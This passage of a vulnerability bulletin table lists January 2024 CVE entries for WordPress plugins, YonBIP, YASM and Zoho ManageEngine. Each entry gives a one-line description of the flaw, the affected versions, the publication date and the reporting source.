wordpress -- wordpress | The ArtPlacer Widget WordPress plugin before 2.20.7 does not sanitize and escape the "id" parameter before submitting the query, leading to a SQLi exploitable by editors and above. Note: due to the lack of a CSRF check, the issue could also be exploited via a CSRF against a logged in editor (or above). | 2024-01-16 | not yet calculated | CVE-2023-6373 | contact@wpscan.com
wordpress -- wordpress | The FastDup WordPress plugin before 2.2 does not prevent directory listing in sensitive directories containing export files. | 2024-01-16 | not yet calculated | CVE-2023-6592 | contact@wpscan.com
wordpress -- wordpress | The Ultimate Maps by Supsystic WordPress plugin before 1.2.16 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed. | 2024-01-16 | not yet calculated | CVE-2023-6732 | contact@wpscan.com
wordpress -- wordpress | The WP Customer Area WordPress plugin before 8.2.1 does not properly validate user capabilities in some of its AJAX actions, allowing malicious users to edit other users' account address. | 2024-01-16 | not yet calculated | CVE-2023-6741 | contact@wpscan.com
wordpress -- wordpress | The WP Customer Area WordPress plugin before 8.2.1 does not properly validate user capabilities in some of its AJAX actions, allowing any user to retrieve other users' account address. | 2024-01-16 | not yet calculated | CVE-2023-6824 | contact@wpscan.com
wordpress -- wordpress | The JSM file_get_contents() Shortcode WordPress plugin before 2.7.1 does not validate one of its shortcode's parameters before making a request to it, which could allow users with the contributor role and above to perform SSRF attacks. | 2024-01-15 | not yet calculated | CVE-2023-6991 | contact@wpscan.com
wordpress -- wordpress | The Community by PeepSo WordPress plugin before 6.3.1.2 does not have a CSRF check when creating a user post (visible on their wall in their profile page), which could allow attackers to make logged in users perform such an action via a CSRF attack. | 2024-01-16 | not yet calculated | CVE-2023-7125 | contact@wpscan.com
wordpress -- wordpress | The Product Enquiry for WooCommerce WordPress plugin before 3.2 does not sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2024-01-16 | not yet calculated | CVE-2023-7151 | contact@wpscan.com
wordpress -- wordpress | The Hubbub Lite (formerly Grow Social) WordPress plugin before 1.32.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). | 2024-01-16 | not yet calculated | CVE-2023-7154 | contact@wpscan.com
wordpress -- wordpress | The Community by PeepSo WordPress plugin before 6.3.1.2 does not sanitise and escape various parameters and generated URLs before outputting them back in attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2024-01-16 | not yet calculated | CVE-2024-0187 | contact@wpscan.com
wordpress -- wordpress | The Contact Form 7 Connector WordPress plugin before 1.2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against administrators. | 2024-01-16 | not yet calculated | CVE-2024-0239 | contact@wpscan.com
wordpress -- wordpress | The T1 WordPress theme through 19.0 is vulnerable to an unauthenticated open redirect with which any attacker can redirect users to arbitrary websites. | 2024-01-16 | not yet calculated | CVE-2023-3771 | contact@wpscan.com
wordpress -- wordpress | The Staff / Employee Business Directory for Active Directory WordPress plugin before 1.2.3 does not sanitize and escape data returned from the LDAP server before rendering it in the page, allowing users who can control their entries in the LDAP directory to inject malicious JavaScript which could be used against high-privilege users such as a site admin. | 2024-01-16 | not yet calculated | CVE-2023-4757 | contact@wpscan.com
wordpress -- wordpress | The Newsletters WordPress plugin before 4.9.3 does not properly escape user-controlled parameters when they are appended to SQL queries and shell commands, which could enable an administrator to run arbitrary commands on the server. | 2024-01-16 | not yet calculated | CVE-2023-4797 | contact@wpscan.com
wordpress -- wordpress | The WP Editor WordPress plugin before 1.2.7 did not sanitize or validate its setting fields, leading to an authenticated (admin+) blind SQL injection issue via an arbitrary parameter when making a request to save the settings. | 2024-01-16 | not yet calculated | CVE-2021-24151 | contact@wpscan.com
xpand_it -- write-back_manager | An arbitrary file upload vulnerability in Xpand IT Write-back Manager v2.3.1 allows attackers to execute arbitrary code via a crafted jsp file. | 2024-01-19 | not yet calculated | CVE-2023-27168 | cve@mitre.org
yasm -- yasm | A memory leak issue discovered in YASM v.1.3.0 allows a local attacker to cause a denial of service via the new_Token function in modules/preprocs/nasm/nasm-pp:1512. | 2024-01-18 | not yet calculated | CVE-2023-51258 | cve@mitre.org
yonbip -- yonbip | An issue in yonyou YonBIP v3_23.05 allows a remote attacker to execute arbitrary code via a crafted script to the ServiceDispatcherServlet uap.framework.rc.itf.IResourceManager component. | 2024-01-20 | not yet calculated | CVE-2023-51906 | cve@mitre.org
yonbip -- yonbip | An arbitrary file upload vulnerability in the uap.framework.rc.itf.IResourceManager interface of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file. | 2024-01-20 | not yet calculated | CVE-2023-51924 | cve@mitre.org
yonbip -- yonbip | An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file. | 2024-01-20 | not yet calculated | CVE-2023-51925 | cve@mitre.org
yonbip -- yonbip | YonBIP v3_23.05 was discovered to contain an arbitrary file read vulnerability via the nc.bs.framework.comn.serv.CommonServletDispatcher component. | 2024-01-20 | not yet calculated | CVE-2023-51926 | cve@mitre.org
yonbip -- yonbip | YonBIP v3_23.05 was discovered to contain a SQL injection vulnerability via the com.yonyou.hrcloud.attend.web.AttendScriptController.runScript() method. | 2024-01-20 | not yet calculated | CVE-2023-51927 | cve@mitre.org
yonbip -- yonbip | An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file. | 2024-01-20 | not yet calculated | CVE-2023-51928 | cve@mitre.org
zoho -- manageengine_servicedesk_plus_msp | Zoho ManageEngine ServiceDesk Plus MSP before 14504 allows stored XSS (by a low-privileged technician) via a task's name in a time sheet. | 2024-01-18 | not yet calculated | CVE-2023-49943 | cve@mitre.org
